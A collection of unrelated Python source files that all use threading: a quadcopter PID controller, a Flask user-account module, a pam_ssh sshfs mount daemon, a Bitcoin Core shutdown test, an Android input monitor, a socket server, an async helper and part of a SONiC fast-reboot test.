self.thread_object = None
self.target = [0,0,0]
self.yaw_target = 0.0
self.run = True
def wrap_angle(self,val):
return( ( val + np.pi) % (2 * np.pi ) - np.pi )
def update(self):
[dest_x,dest_y,dest_z] = self.target
[x,y,z,x_dot,y_dot,z_dot,theta,phi,gamma,theta_dot,phi_dot,gamma_dot] = self.get_state(self.quad_identifier)
x_error = dest_x-x
y_error = dest_y-y
z_error = dest_z-z
self.xi_term += self.LINEAR_I[0]*x_error
self.yi_term += self.LINEAR_I[1]*y_error
self.zi_term += self.LINEAR_I[2]*z_error
dest_x_dot = self.LINEAR_P[0]*(x_error) + self.LINEAR_D[0]*(-x_dot) + self.xi_term
dest_y_dot = self.LINEAR_P[1]*(y_error) + self.LINEAR_D[1]*(-y_dot) + self.yi_term
dest_z_dot = self.LINEAR_P[2]*(z_error) + self.LINEAR_D[2]*(-z_dot) + self.zi_term
throttle = np.clip(dest_z_dot,self.Z_LIMITS[0],self.Z_LIMITS[1])
dest_theta = self.LINEAR_TO_ANGULAR_SCALER[0]*(dest_x_dot*math.sin(gamma)-dest_y_dot*math.cos(gamma))
dest_phi = self.LINEAR_TO_ANGULAR_SCALER[1]*(dest_x_dot*math.cos(gamma)+dest_y_dot*math.sin(gamma))
dest_gamma = self.yaw_target
dest_theta,dest_phi = np.clip(dest_theta,self.TILT_LIMITS[0],self.TILT_LIMITS[1]),np.clip(dest_phi,self.TILT_LIMITS[0],self.TILT_LIMITS[1])
theta_error = dest_theta-theta
phi_error = dest_phi-phi
gamma_dot_error = (self.YAW_RATE_SCALER*self.wrap_angle(dest_gamma-gamma)) - gamma_dot
self.thetai_term += self.ANGULAR_I[0]*theta_error
self.phii_term += self.ANGULAR_I[1]*phi_error
self.gammai_term += self.ANGULAR_I[2]*gamma_dot_error
x_val = self.ANGULAR_P[0]*(theta_error) + self.ANGULAR_D[0]*(-theta_dot) + self.thetai_term
y_val = self.ANGULAR_P[1]*(phi_error) + self.ANGULAR_D[1]*(-phi_dot) + self.phii_term
z_val = self.ANGULAR_P[2]*(gamma_dot_error) + self.gammai_term
z_val = np.clip(z_val,self.YAW_CONTROL_LIMITS[0],self.YAW_CONTROL_LIMITS[1])
m1 = throttle + x_val + z_val
m2 = throttle + y_val - z_val
m3 = throttle - x_val + z_val
m4 = throttle - y_val - z_val
M = np.clip([m1,m2,m3,m4],self.MOTOR_LIMITS[0],self.MOTOR_LIMITS[1])
self.actuate_motors(self.quad_identifier,M)
def update_target(self,target):
self.target = target
def update_yaw_target(self,target):
self.yaw_target = self.wrap_angle(target)
def thread_run(self,update_rate,time_scaling):
update_rate = update_rate*time_scaling
last_update = self.get_time()
while(self.run==True):
time.sleep(0)
self.time = self.get_time()
if (self.time - last_update).total_seconds() > update_rate:
self.update()
last_update = self.time
def start_thread(self,update_rate=0.005,time_scaling=1):
self.thread_object = threading.Thread(target=self.thread_run,args=(update_rate,time_scaling))
self.thread_object.start()
def stop_thread(self):
self.run = False
class Controller_PID_Velocity(Controller_PID_Point2Point):
def update(self):
[dest_x,dest_y,dest_z] = self.target
[x,y,z,x_dot,y_dot,z_dot,theta,phi,gamma,theta_dot,phi_dot,gamma_dot,_] = self.get_state(self.quad_identifier)
x_error = dest_x-x_dot
y_error = dest_y-y_dot
z_error = dest_z-z
self.xi_term += self.LINEAR_I[0]*x_error
self.yi_term += self.LINEAR_I[1]*y_error
self.zi_term += self.LINEAR_I[2]*z_error
dest_x_dot = self.LINEAR_P[0]*(x_error) + self.LINEAR_D[0]*(-x_dot) + self.xi_term
dest_y_dot = self.LINEAR_P[1]*(y_error) + self.LINEAR_D[1]*(-y_dot) + self.yi_term
dest_z_dot = self.LINEAR_P[2]*(z_error) + self.LINEAR_D[2]*(-z_dot) + self.zi_term
throttle = np.clip(dest_z_dot,self.Z_LIMITS[0],self.Z_LIMITS[1])
dest_theta = self.LINEAR_TO_ANGULAR_SCALER[0]*(dest_x_dot*math.sin(gamma)-dest_y_dot*math.cos(gamma))
dest_phi = self.LINEAR_TO_ANGULAR_SCALER[1]*(dest_x_dot*math.cos(gamma)+dest_y_dot*math.sin(gamma))
dest_gamma = self.yaw_target
dest_theta,dest_phi = np.clip(dest_theta,self.TILT_LIMITS[0],self.TILT_LIMITS[1]),np.clip(dest_phi,self.TILT_LIMITS[0],self.TILT_LIMITS[1])
theta_error = dest_theta-theta
phi_error = dest_phi-phi
gamma_dot_error = (self.YAW_RATE_SCALER*self.wrap_angle(dest_gamma-gamma)) - gamma_dot
self.thetai_term += self.ANGULAR_I[0]*theta_error
self.phii_term += self.ANGULAR_I[1]*phi_error
self.gammai_term += self.ANGULAR_I[2]*gamma_dot_error
x_val = self.ANGULAR_P[0]*(theta_error) + self.ANGULAR_D[0]*(-theta_dot) + self.thetai_term
y_val = self.ANGULAR_P[1]*(phi_error) + self.ANGULAR_D[1]*(-phi_dot) + self.phii_term
z_val = self.ANGULAR_P[2]*(gamma_dot_error) + self.gammai_term
z_val = np.clip(z_val,self.YAW_CONTROL_LIMITS[0],self.YAW_CONTROL_LIMITS[1])
m1 = throttle + x_val + z_val
m2 = throttle + y_val - z_val
m3 = throttle - x_val + z_val
m4 = throttle - y_val - z_val
M = np.clip([m1,m2,m3,m4],self.MOTOR_LIMITS[0],self.MOTOR_LIMITS[1])
self.actuate_motors(self.quad_identifier,M)
|
views.py
|
# project/users/views.py
#################
#### imports ####
#################
from flask import render_template, Blueprint, request, redirect, url_for, flash, abort
from sqlalchemy.exc import IntegrityError
from flask_login import login_user, current_user, login_required, logout_user
from flask_mail import Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from datetime import datetime
from twilio.rest import TwilioRestClient
from .forms import RegisterForm, LoginForm, EmailForm, PasswordForm, EditUserForm
from project import db, mail, app
from project.models import User
################
#### config ####
################
users_blueprint = Blueprint('users', __name__)
##########################
#### helper functions ####
##########################
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, html_body):
msg = Message(subject, recipients=recipients)
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for(
'users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
html = render_template(
'email_confirmation.html',
confirm_url=confirm_url)
send_email('Confirm Your Email Address', [user_email], html)
def send_password_reset_email(user_email):
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
password_reset_url = url_for(
'users.reset_with_token',
token = password_reset_serializer.dumps(user_email, salt='password-reset-salt'),
_external=True)
html = render_template(
'email_password_reset.html',
password_reset_url=password_reset_url)
send_email('Password Reset Requested', [user_email], html)
def send_new_user_text_message(new_user_email):
client = TwilioRestClient(app.config['ACCOUNT_SID'], app.config['AUTH_TOKEN'])
message = client.messages.create(
body="Kennedy Family Recipes... new user registered: {}".format(new_user_email), # Message body, if any
to=app.config['ADMIN_PHONE_NUMBER'],
from_=app.config['TWILIO_PHONE_NUMBER']
)
# flash('Text message sent to {}: {}'.format(app.config['ADMIN_PHONE_NUMBER'], message.body), 'success')
return
################
#### routes ####
################
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.email.data, form.password.data)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
login_user(new_user)
send_confirmation_email(new_user.email)
if 'ACCOUNT_SID' in app.config and not app.config['TESTING']:
send_new_user_text_message(new_user.email)
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect(url_for('recipes.user_recipes', recipe_type='All'))
except IntegrityError:
db.session.rollback()
flash('ERROR! Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.is_correct_password(form.password.data):
user.authenticated = True
user.last_logged_in = user.current_logged_in
user.current_logged_in = datetime.now()
db.session.add(user)
db.session.commit()
login_user(user)
flash('Thanks for logging in, {}'.format(current_user.email))
return redirect(url_for('recipes.user_recipes', recipe_type='All'))
else:
flash('ERROR! Incorrect login credentials.', 'error')
return render_template('login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
flash('Goodbye!', 'info')
return redirect(url_for('recipes.public_recipes'))
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!', 'success')
return redirect(url_for('recipes.public_recipes'))
@users_blueprint.route('/reset', methods=["GET", "POST"])
def reset():
form = EmailForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=form.email.data).first_or_404()
except:
flash('Invalid email address!', 'error')
return render_template('password_reset_email.html', form=form)
if user.email_confirmed:
send_password_reset_email(user.email)
flash('Please check your email for a password reset link.', 'success')
else:
flash('Your email address must be confirmed before attempting a password reset.', 'error')
return redirect(url_for('users.login'))
return render_template('password_reset_email.html', form=form)
@users_blueprint.route('/reset/<token>', methods=["GET", "POST"])
def reset_with_token(token):
try:
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
except:
flash('The password reset link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
form = PasswordForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=email).first_or_404()
except:
flash('Invalid email address!', 'error')
return redirect(url_for('users.login'))
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('users.login'))
return render_template('reset_password_with_token.html', form=form, token=token)
@users_blueprint.route('/user_profile')
@login_required
def user_profile():
return render_template('user_profile.html')
@users_blueprint.route('/email_change', methods=["GET", "POST"])
@login_required
def user_email_change():
form = EmailForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
user_check = User.query.filter_by(email=form.email.data).first()
if user_check is None:
user = current_user
user.email = form.email.data
user.email_confirmed = False
user.email_confirmed_on = None
user.email_confirmation_sent_on = datetime.now()
db.session.add(user)
db.session.commit()
send_confirmation_email(user.email)
flash('Email changed! Please confirm your new email address (link sent to new email).', 'success')
return redirect(url_for('users.user_profile'))
else:
flash('Sorry, that email already exists!', 'error')
except IntegrityError:
flash('Error! That email already exists!', 'error')
return render_template('email_change.html', form=form)
@users_blueprint.route('/password_change', methods=["GET", "POST"])
@login_required
def user_password_change():
form = PasswordForm()
if request.method == 'POST':
if form.validate_on_submit():
user = current_user
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Password has been updated!', 'success')
return redirect(url_for('users.user_profile'))
return render_template('password_change.html', form=form)
@users_blueprint.route('/resend_confirmation')
@login_required
def resend_email_confirmation():
try:
send_confirmation_email(current_user.email)
flash('Email sent to confirm your email address. Please check your email!', 'success')
except IntegrityError:
flash('Error! Unable to send email to confirm your email address.', 'error')
return redirect(url_for('users.user_profile'))
@users_blueprint.route('/admin_view_users')
@login_required
def admin_view_users():
if current_user.role != 'admin':
abort(403)
users = User.query.order_by(User.id).all()
return render_template('admin_view_users.html', users=users)
@users_blueprint.route('/admin/delete/user/<user_id>')
@login_required
def admin_delete_user(user_id):
if current_user.role != 'admin':
abort(403)
user = User.query.filter_by(id=user_id).first_or_404()
db.session.delete(user)
db.session.commit()
flash('User #{} was deleted.'.format(user_id), 'success')
return redirect(url_for('users.admin_view_users'))
@users_blueprint.route('/admin/edit/user/<user_id>', methods=["GET", "POST"])
@login_required
def admin_edit_user(user_id):
if current_user.role != 'admin':
abort(403)
form = EditUserForm()
user = User.query.filter_by(id=user_id).first_or_404()
if request.method == 'POST':
if form.validate_on_submit():
user.import_form_data(form)
db.session.add(user)
db.session.commit()
flash('User #{} was updated to email address: {}'.format(user.id, user.email), 'success')
return redirect(url_for('users.admin_view_users'))
return render_template('admin_edit_user.html', form=form, user=user)
|
daemon.py
|
import os
import sys
import pwd
import subprocess
import threading
import json
import socket
import pipes
import time
ENVIRON = {'PATH': '/bin:/usr/bin'}
config = json.load(open('config.json'))
open_session_lock = threading.Lock()
def auth_helper(username, token):
cmd = ['ssh',
'-o', 'StrictHostKeyChecking=no',
'-o', 'PubkeyAuthentication=no',
'-l' + username,
config['ssh_host'], 'true']
return run_ssh(cmd, token)
def mount_helper(username, token, pw):
cmd = ['sshfs', '-f',
'-o', 'reconnect,workaround=all',
'-o', 'nonempty,allow_other',
'-o', 'compression=yes',
'-o', 'uid=%d,gid=%d' % (
pw.pw_uid, pw.pw_gid),
'%s@%s:' % (username, config['ssh_host']),
pw.pw_dir]
return run_ssh(cmd, token)
def run_ssh(cmd, token):
ipipe, opipe = os.pipe()
cmd = ['sshpass', '-d%d' % ipipe, '--'] + cmd
proc = subprocess.Popen(cmd,
env=ENVIRON,
close_fds=False,
stdout=sys.stderr)
os.write(opipe, token + '\n')
os.close(opipe)
return proc.wait()
def open_session(user, auth_token):
pw = pwd.getpwnam(user)
path = pw.pw_dir
try:
os.mkdir(path)
except OSError:
pass
else:
os.chown(path, pw.pw_uid, pw.pw_gid)
if not ismount(path):
f = lambda: mount_helper(user, auth_token, pw)
threading.Thread(target=f).start()
wait_for_mount(path)
subprocess.check_call([
'mount', '-t', 'tmpfs', 'cache',
path + '/.cache'
])
return 0
else:
return 0
def wait_for_mount(path, timeout=5):
for i in xrange(10 * timeout):
if ismount(path):
return
time.sleep(0.1)
raise IOError('not mounted')
def ismount(path):
for line in open('/proc/mounts'):
if line.split()[1] == path:
return True
def auth(user, auth_token):
return auth_helper(user, auth_token)
def handle(sock):
f = sock.makefile('r+')
method, args = json.loads(f.readline())
code = -1
if method == 'open_session':
with open_session_lock:
code = open_session(**args)
elif method == 'auth':
code = auth(**args)
print 'response', method, code
f.write(str(code) + '\n')
def loop():
ADDR = '/var/run/pam_ssh.sock'
if os.path.exists(ADDR):
os.remove(ADDR)
sock = socket.socket(socket.AF_UNIX)
sock.bind(ADDR)
os.chmod(ADDR, 0o700)
sock.listen(2)
while True:
child, addr = sock.accept()
threading.Thread(target=handle, args=[child]).start()
del child
if __name__ == '__main__':
loop()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test weid shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
user_input_monitor.py
|
import subprocess
import logging
from .adapter import Adapter
class UserInputMonitor(Adapter):
"""
A connection with the target device through `getevent`.
`getevent` is able to get raw user input from device.
"""
def __init__(self, device=None):
"""
initialize connection
:param device: a Device instance
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
self.process = None
if device.output_dir is None:
self.out_file = None
else:
self.out_file = "%s/user_input.txt" % device.output_dir
def connect(self):
self.process = subprocess.Popen(["adb", "-s", self.device.serial, "shell", "getevent", "-lt"],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
import threading
listen_thread = threading.Thread(target=self.handle_output)
listen_thread.start()
def disconnect(self):
self.connected = False
if self.process is not None:
self.process.terminate()
def check_connectivity(self):
return self.connected
def handle_output(self):
self.connected = True
f = None
if self.out_file is not None:
f = open(self.out_file, 'w')
while self.connected:
if self.process is None:
continue
line = self.process.stdout.readline()
if not isinstance(line, str):
line = line.decode()
self.parse_line(line)
if f is not None:
f.write(line)
if f is not None:
f.close()
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def parse_line(self, getevent_line):
pass
|
server.py
|
#!/usr/bin/env python
import socket #import socket module
import time
import threading
import cv2
import base64
#camera = cv2.VideoCapture(0)
def sendData(client):
while(True):
#grabbed, frame = camera.read()
#frame = cv2.resize(frame, (640, 480))
#encoded, buffer = cv2.imencode('.jpg', frame)
#jpg_as_text = base64.b64encode(buffer)
str = "hello hello hello hello hello"
#client.send(jpg_as_text.encode())
client.send(str)
#time.sleep(0.005)
cs = socket.socket() #create a socket object
cs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
cport = 12397 # Reserve a port for your service
cs.bind(('', cport)) #Bind to the port
cs.listen(5) #Wait for the client connection
c,addr = cs.accept() #Establish a connection
sendThread = threading.Thread(target=sendData, args=(c,))
sendThread.start()
cs.close
|
async_calls.py
|
# Copyright 2019-2020 Stanislav Pidhorskyi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import threading
__all__ = ['async_func']
class AsyncCall(object):
def __init__(self, fnc, callback=None):
self.callable = fnc
self.callback = callback
self.result = None
def __call__(self, *args, **kwargs):
self.thread = threading.Thread(target=self.run, name=self.callable.__name__, args=args, kwargs=kwargs)
self.thread.start()
return self
def wait(self, timeout=None):
self.thread.join(timeout)
if self.thread.isAlive():
raise TimeoutError
else:
return self.result
def run(self, *args, **kwargs):
self.result = self.callable(*args, **kwargs)
if self.callback:
self.callback(self.result)
class AsyncMethod(object):
def __init__(self, fnc, callback=None):
self.callable = fnc
self.callback = callback
def __call__(self, *args, **kwargs):
return AsyncCall(self.callable, self.callback)(*args, **kwargs)
def async_func(fnc=None, callback=None):
if fnc is None:
def add_async_callback(f):
return AsyncMethod(f, callback)
return add_async_callback
else:
return AsyncMethod(fnc, callback)
|
advanced-reboot.py
|
#
# ptf --test-dir ptftests fast-reboot --qlen=1000 --platform remote -t 'verbose=True;dut_username="admin";dut_hostname="10.0.0.243";reboot_limit_in_seconds=30;portchannel_ports_file="/tmp/portchannel_interfaces.json";vlan_ports_file="/tmp/vlan_interfaces.json";ports_file="/tmp/ports.json";dut_mac="4c:76:25:f5:48:80";default_ip_range="192.168.0.0/16";vlan_ip_range="{\"Vlan100\": \"172.0.0.0/22\"}";arista_vms="[\"10.0.0.200\",\"10.0.0.201\",\"10.0.0.202\",\"10.0.0.203\"]"' --platform-dir ptftests --disable-vxlan --disable-geneve --disable-erspan --disable-mpls --disable-nvgre
#
#
# This test checks that DUT is able to make FastReboot procedure
#
# This test supposes that fast-reboot/warm-reboot initiates by running /usr/bin/{fast,warm}-reboot command.
#
# The test uses "pings". The "pings" are packets which are sent through dataplane in two directions
# 1. From one of vlan interfaces to T1 device. The source ip, source interface, and destination IP are chosen randomly from valid choices. Number of packet is 100.
# 2. From all of portchannel ports to all of vlan ports. The source ip, source interface, and destination IP are chosed sequentially from valid choices.
# Currently we have 500 distrinct destination vlan addresses. Our target to have 1000 of them.
#
# The test sequence is following:
# 1. Check that DUT is stable. That means that "pings" work in both directions: from T1 to servers and from servers to T1.
# 2. If DUT is stable the test starts continiously pinging DUT in both directions.
# 3. The test runs '/usr/bin/{fast,warm}-reboot' on DUT remotely. The ssh key supposed to be uploaded by ansible before the test
# 4. As soon as it sees that ping starts failuring in one of directions the test registers a start of dataplace disruption
# 5. As soon as the test sees that pings start working for DUT in both directions it registers a stop of dataplane disruption
# 6. If the length of the disruption is less than 30 seconds (if not redefined by parameter) - the test passes
# 7. If there're any drops, when control plane is down - the test fails
# 8. When test start reboot procedure it connects to all VM (which emulates T1) and starts fetching status of BGP and LACP
# LACP is supposed to be down for one time only, if not - the test fails
# if default value of BGP graceful restart timeout is less than 120 seconds the test fails
# if BGP graceful restart is not enabled on DUT the test fails
# If BGP graceful restart timeout value is almost exceeded (less than 15 seconds) the test fails
# if BGP routes disappeares more then once, the test failed
#
# The test expects you're running the test with link state propagation helper.
# That helper propagate a link state from fanout switch port to corresponding VM port
#
import ptf
from ptf.base_tests import BaseTest
from ptf import config
import ptf.testutils as testutils
from ptf.testutils import *
from ptf.dataplane import match_exp_pkt
import datetime
import time
import subprocess
from ptf.mask import Mask
import socket
import ptf.packet as scapy
import thread
import threading
from multiprocessing.pool import ThreadPool, TimeoutError
import os
import signal
import random
import struct
import socket
from pprint import pprint
from fcntl import ioctl
import sys
import json
import re
from collections import defaultdict
import json
import Queue
import pickle
from operator import itemgetter
import scapy.all as scapyall
import itertools
from device_connection import DeviceConnection
import multiprocessing
import ast
from arista import Arista
import sad_path as sp
class StateMachine():
def __init__(self, init_state='init'):
self.state_lock = threading.RLock()
self.state_time = {} # Recording last time when entering a state
self.state = None
self.flooding = False
self.set(init_state)
def set(self, state):
with self.state_lock:
self.state = state
self.state_time[state] = datetime.datetime.now()
def get(self):
with self.state_lock:
cur_state = self.state
return cur_state
def get_state_time(self, state):
with self.state_lock:
time = self.state_time[state]
return time
def set_flooding(self, flooding):
with self.state_lock:
self.flooding = flooding
def is_flooding(self):
with self.state_lock:
flooding = self.flooding
return flooding
class ReloadTest(BaseTest):
TIMEOUT = 0.5
PKT_TOUT = 1
VLAN_BASE_MAC_PATTERN = '72060001{:04}'
LAG_BASE_MAC_PATTERN = '5c010203{:04}'
SOCKET_RECV_BUFFER_SIZE = 10 * 1024 * 1024
def __init__(self):
BaseTest.__init__(self)
self.fails = {}
self.info = {}
self.cli_info = {}
self.logs_info = {}
self.lacp_pdu_times = {}
self.log_lock = threading.RLock()
self.vm_handle = None
self.sad_handle = None
self.process_id = str(os.getpid())
self.test_params = testutils.test_params_get()
self.check_param('verbose', False, required=False)
self.check_param('dut_username', '', required=True)
self.check_param('dut_password', '', required=True)
self.check_param('dut_hostname', '', required=True)
self.check_param('reboot_limit_in_seconds', 30, required=False)
self.check_param('reboot_type', 'fast-reboot', required=False)
self.check_param('graceful_limit', 240, required=False)
self.check_param('portchannel_ports_file', '', required=True)
self.check_param('vlan_ports_file', '', required=True)
self.check_param('ports_file', '', required=True)
self.check_param('dut_mac', '', required=True)
self.check_param('default_ip_range', '', required=True)
self.check_param('vlan_ip_range', '', required=True)
self.check_param('lo_prefix', '10.1.0.32/32', required=False)
self.check_param('lo_v6_prefix', 'fc00:1::/64', required=False)
self.check_param('arista_vms', [], required=True)
self.check_param('min_bgp_gr_timeout', 15, required=False)
self.check_param('warm_up_timeout_secs', 300, required=False)
self.check_param('dut_stabilize_secs', 30, required=False)
self.check_param('preboot_files', None, required=False)
self.check_param('preboot_oper', None, required=False) # preboot sad path to inject before warm-reboot
self.check_param('inboot_oper', None, required=False) # sad path to inject during warm-reboot
self.check_param('nexthop_ips', [], required=False) # nexthops for the routes that will be added during warm-reboot
self.check_param('allow_vlan_flooding', False, required=False)
self.check_param('allow_mac_jumping', False, required=False)
self.check_param('sniff_time_incr', 300, required=False)
self.check_param('vnet', False, required=False)
self.check_param('vnet_pkts', None, required=False)
self.check_param('target_version', '', required=False)
self.check_param('bgp_v4_v6_time_diff', 40, required=False)
self.check_param('asic_type', '', required=False)
self.check_param('logfile_suffix', None, required=False)
if not self.test_params['preboot_oper'] or self.test_params['preboot_oper'] == 'None':
self.test_params['preboot_oper'] = None
if not self.test_params['inboot_oper'] or self.test_params['inboot_oper'] == 'None':
self.test_params['inboot_oper'] = None
# initialize sad oper
if self.test_params['preboot_oper']:
self.sad_oper = self.test_params['preboot_oper']
else:
self.sad_oper = self.test_params['inboot_oper']
if self.test_params['logfile_suffix']:
self.logfile_suffix = self.test_params['logfile_suffix']
else:
self.logfile_suffix = self.sad_oper
if "warm-reboot" in self.test_params['reboot_type']:
reboot_log_prefix = "warm-reboot"
else:
reboot_log_prefix = self.test_params['reboot_type']
if self.logfile_suffix:
self.log_file_name = '/tmp/%s-%s.log' % (reboot_log_prefix, self.logfile_suffix)
self.report_file_name = '/tmp/%s-%s-report.json' % (reboot_log_prefix, self.logfile_suffix)
else:
self.log_file_name = '/tmp/%s.log' % reboot_log_prefix
self.report_file_name = '/tmp/%s-report.json' % reboot_log_prefix
self.report = dict()
self.log_fp = open(self.log_file_name, 'w')
self.packets_list = []
self.vnet = self.test_params['vnet']
if (self.vnet):
self.packets_list = json.load(open(self.test_params['vnet_pkts']))
# a flag whether to populate FDB by sending traffic from simulated servers
# usually ARP responder will make switch populate its FDB table, but Mellanox on 201803 has
# no L3 ARP support, so this flag is used to W/A this issue
self.setup_fdb_before_test = self.test_params.get('setup_fdb_before_test', False)
# Default settings
self.ping_dut_pkts = 10
self.arp_ping_pkts = 1
self.nr_pc_pkts = 100
self.nr_tests = 3
self.reboot_delay = 10
self.task_timeout = 300 # Wait up to 5 minutes for tasks to complete
self.max_nr_vl_pkts = 500 # FIXME: should be 1000.
# But ptf is not fast enough + swss is slow for FDB and ARP entries insertions
self.timeout_thr = None
self.time_to_listen = 240.0 # Listen for more then 240 seconds, to be used in sniff_in_background method.
# Inter-packet interval, to be used in send_in_background method.
# Improve this interval to gain more precision of disruptions.
self.send_interval = 0.0035
self.packets_to_send = min(int(self.time_to_listen / (self.send_interval + 0.0015)), 45000) # How many packets to be sent in send_in_background method
# Thread pool for background watching operations
self.pool = ThreadPool(processes=3)
# State watcher attributes
self.watching = False
self.cpu_state = StateMachine('init')
self.asic_state = StateMachine('init')
self.vlan_state = StateMachine('init')
self.vlan_lock = threading.RLock()
self.asic_state_time = {} # Recording last asic state entering time
self.asic_vlan_reach = [] # Recording asic vlan reachability
self.recording = False # Knob for recording asic_vlan_reach
# light_probe:
# True : when one direction probe fails, don't probe another.
# False: when one direction probe fails, continue probe another.
self.light_probe = False
# We have two data plane traffic generators which are mutualy exclusive
# one is the reachability_watcher thread
# second is the fast send_in_background
self.dataplane_io_lock = threading.Lock()
self.allow_vlan_flooding = bool(self.test_params['allow_vlan_flooding'])
self.dut_connection = DeviceConnection(
self.test_params['dut_hostname'],
self.test_params['dut_username'],
password=self.test_params['dut_password'],
alt_password=self.test_params.get('alt_password')
)
# Check if platform type is kvm
stdout, stderr, return_code = self.dut_connection.execCommand("show platform summary | grep Platform | awk '{print $2}'")
platform_type = str(stdout[0]).replace('\n', '')
if platform_type == 'x86_64-kvm_x86_64-r0':
self.kvm_test = True
else:
self.kvm_test = False
return
def read_json(self, name):
with open(self.test_params[name]) as fp:
content = json.load(fp)
return content
def read_port_indices(self):
port_indices = self.read_json('ports_file')
return port_indices
def read_vlan_portchannel_ports(self):
portchannel_content = self.read_json('portchannel_ports_file')
portchannel_names = [pc['name'] for pc in portchannel_content.values()]
vlan_content = self.read_json('vlan_ports_file')
ports_per_vlan = dict()
pc_in_vlan = []
for vlan in self.vlan_ip_range.keys():
ports_in_vlan = []
for ifname in vlan_content[vlan]['members']:
if ifname in portchannel_names:
pc_in_vlan.append(ifname)
else:
ports_in_vlan.append(self.port_indices[ifname])
ports_per_vlan[vlan] = ports_in_vlan
active_portchannels = list()
for neighbor_info in list(self.vm_dut_map.values()):
active_portchannels.append(neighbor_info["dut_portchannel"])
pc_ifaces = []
for pc in portchannel_content.values():
if not pc['name'] in pc_in_vlan and pc['name'] in active_portchannels:
pc_ifaces.extend([self.port_indices[member] for member in pc['members']])
return ports_per_vlan, pc_ifaces
def check_param(self, param, default, required = False):
if param not in self.test_params:
if required:
raise Exception("Test parameter '%s' is required" % param)
self.test_params[param] = default
def random_ip(self, ip):
net_addr, mask = ip.split('/')
n_hosts = 2**(32 - int(mask))
random_host = random.randint(2, n_hosts - 2)
return self.host_ip(ip, random_host)
def host_ip(self, net_ip, host_number):
src_addr, mask = net_ip.split('/')
n_hosts = 2**(32 - int(mask))
if host_number > (n_hosts - 2):
raise Exception("host number %d is greater than number of hosts %d in the network %s" % (host_number, n_hosts - 2, net_ip))
src_addr_n = struct.unpack(">I", socket.inet_aton(src_addr))[0]
net_addr_n = src_addr_n & (2**32 - n_hosts)
host_addr_n = net_addr_n + host_number
host_ip = socket.inet_ntoa(struct.pack(">I", host_addr_n))
return host_ip
def random_port(self, ports):
return random.choice(ports)
def log(self, message, verbose=False):
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with self.log_lock:
if verbose and self.test_params['verbose'] or not verbose:
print "%s : %s" % (current_time, message)
self.log_fp.write("%s : %s\n" % (current_time, message))
self.log_fp.flush()
def timeout(self, func, seconds, message):
signal = multiprocessing.Event()
async_res = self.pool.apply_async(func, args=(signal,))
try:
res = async_res.get(timeout=seconds)
except Exception as err:
# TimeoutError and Exception's from func
# captured here
signal.set()
raise type(err)(message)
return res
def generate_vlan_servers(self):
vlan_host_map = defaultdict(dict)
self.vlan_host_ping_map = defaultdict(dict)
self.nr_vl_pkts = 0 # Number of packets from upper layer
